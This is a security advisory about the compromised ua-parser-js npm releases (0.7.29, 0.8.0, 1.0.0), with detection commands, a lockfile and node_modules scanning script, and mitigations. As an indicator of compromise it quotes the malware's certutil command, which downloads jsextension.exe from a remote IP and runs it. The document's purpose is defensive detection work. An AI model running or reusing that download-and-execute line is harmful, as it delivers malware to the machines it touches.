Advisory October 25, 2021

Compromised NPM packages

Obrela SOC

Supply chain attacks compromise a product during its development, build or delivery stages instead of attacking the deployed product directly. npm (Node Package Manager), the package registry for Node.js, is among the largest software registries and has repeatedly been found to host packages carrying malicious code. The latest case is the "ua-parser-js" package: the compromised releases download and execute a cryptominer. Because this package is very widely used, directly and as a dependency of other packages, it is important to verify whether any of the affected versions was installed during development or in CI, and whether it has spread to other machines. Both Windows and Linux environments are reported to be affected.

Affected versions

  • 0.7.29
  • 0.8.0
  • 1.0.0

Indicators of Compromise

On Windows the malicious package uses the built-in certutil tool to download and execute the payload:

certutil.exe -urlcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe

The contacted host 159.148.186.228 and the dropped file jsextension.exe are the indicators to search for. Independently of this specific IoC, certutil.exe being launched with "-urlcache -f" and an HTTP(S) URL is a well-known living-off-the-land download technique and is worth alerting on in its own right.

To detect references to the malicious versions in npm lockfiles on Linux systems, use the following command (it matches the resolved tarball URL, ua-parser-js-<version>.tgz, recorded in package-lock.json):

find / -name "package-lock.json" -exec grep --color -EHni "ua-parser-js-(0.7.29|0.8.0|1.0.0)" {} \; 2>/dev/null

The same pattern also matches yarn.lock files, so run it with -name "yarn.lock" as well. A lockfile only shows what was resolved; to confirm what is actually installed, check the "version" field of node_modules/ua-parser-js/package.json in each project.
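The following script is an added example, not part of the original advisory, that extends the one-line find above: it scans both npm and Yarn lockfiles for the compromised tarball versions and additionally checks the version of every installed copy under node_modules. It assumes the standard lockfile layouts (a resolved URL ending in ua-parser-js-<version>.tgz) and a normal package.json in the installed package; the sample project trees it creates are constructed for demonstration.

```shell
#!/bin/sh
# Added example (not from the original advisory): locate installs of the
# compromised ua-parser-js releases 0.7.29, 0.8.0 and 1.0.0 in a source tree.
# Assumptions: package-lock.json / yarn.lock record a resolved tarball URL that
# ends in ua-parser-js-<version>.tgz, and an installed copy lives at
# node_modules/ua-parser-js/package.json with a "version" field.

BAD_VERSIONS='0\.7\.29|0\.8\.0|1\.0\.0'

# scan_lockfile FILE: print matching lines as FILE:LINE:TEXT.
# Exit status 0 if a compromised version is referenced, 1 if not.
scan_lockfile() {
    grep -EHn "ua-parser-js-($BAD_VERSIONS)\.tgz" "$1"
}

# scan_installed PKGJSON: check an installed node_modules/ua-parser-js/package.json.
# Prints the installed version; exit 0 if it is a compromised one, 1 otherwise.
scan_installed() {
    ver=$(grep -E '^[[:space:]]*"version"[[:space:]]*:' "$1" | head -n 1 |
          sed -E 's/.*"version"[[:space:]]*:[[:space:]]*"([^"]+)".*/\1/')
    printf '%s\n' "$ver"
    printf '%s\n' "$ver" | grep -Eq '^('"$BAD_VERSIONS"')$'
}

# scan_tree ROOT: walk a source tree. Lockfiles inside node_modules are skipped
# (they belong to dependencies); installed copies under any node_modules are
# checked directly. Exit 0 if anything compromised was found, 1 otherwise.
scan_tree() {
    root="$1"
    hits=0
    lock_hits=$(find "$root" -type f \( -name package-lock.json -o -name yarn.lock \) \
        ! -path '*/node_modules/*' \
        -exec grep -EHn "ua-parser-js-($BAD_VERSIONS)\.tgz" {} + 2>/dev/null || true)
    [ -n "$lock_hits" ] && { printf '%s\n' "$lock_hits"; hits=1; }
    inst_hits=$(find "$root" -type f -path '*/node_modules/ua-parser-js/package.json' 2>/dev/null |
        while IFS= read -r f; do
            v=$(scan_installed "$f") && printf '%s: installed version %s is compromised\n' "$f" "$v"
        done)
    [ -n "$inst_hits" ] && { printf '%s\n' "$inst_hits"; hits=1; }
    [ "$hits" -eq 1 ]
}

# make_samples: build two constructed sample projects in a temp dir and print
# its path. "bad" pins the compromised 0.7.29; "ok" uses 0.7.28 / 0.7.30.
make_samples() {
    d=$(mktemp -d)
    mkdir -p "$d/bad/node_modules/ua-parser-js" "$d/ok/node_modules/ua-parser-js"
    cat > "$d/bad/package-lock.json" <<'EOF'
{
  "name": "bad-app",
  "lockfileVersion": 2,
  "packages": {
    "node_modules/ua-parser-js": {
      "version": "0.7.29",
      "resolved": "https://registry.npmjs.org/ua-parser-js/-/ua-parser-js-0.7.29.tgz"
    }
  }
}
EOF
    printf '{\n  "name": "ua-parser-js",\n  "version": "0.7.29"\n}\n' \
        > "$d/bad/node_modules/ua-parser-js/package.json"
    cat > "$d/ok/yarn.lock" <<'EOF'
ua-parser-js@^0.7.28:
  version "0.7.28"
  resolved "https://registry.yarnpkg.com/ua-parser-js/-/ua-parser-js-0.7.28.tgz#abc"
EOF
    printf '{\n  "name": "ua-parser-js",\n  "version": "0.7.30"\n}\n' \
        > "$d/ok/node_modules/ua-parser-js/package.json"
    printf '%s\n' "$d"
}

# Stand-alone demo on the constructed samples. To scan a real checkout, call
# scan_tree /path/to/source instead.
demo=$(make_samples)
if scan_tree "$demo"; then
    echo "Compromised ua-parser-js found under $demo"
else
    echo "No compromised ua-parser-js under $demo"
fi
rm -rf "$demo"
```

The installed-copy check is the one that matters for incident scoping: a lockfile hit proves the version was resolved at some point, while a matching node_modules/ua-parser-js/package.json proves the package, and therefore its install script, ran on that host.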

Mitigation

At the time of writing the hijacked releases cannot be revoked by the package's developers, so two mitigations are suggested. Note that neither one cleans a machine on which a compromised version was already installed: the install script has already run there, so the host should be investigated and the downloaded payload removed.

  • Pin the package to the last known-good version with a "resolutions" entry in package.json, so that neither CI nor developer builds can resolve a compromised release: "resolutions": { "ua-parser-js": "0.7.28" } (this field is honoured by Yarn; plain npm ignores it)
  • Upgrade to the clean releases published after the compromise:
    • 0.7.30
    • 0.8.1
    • 1.0.1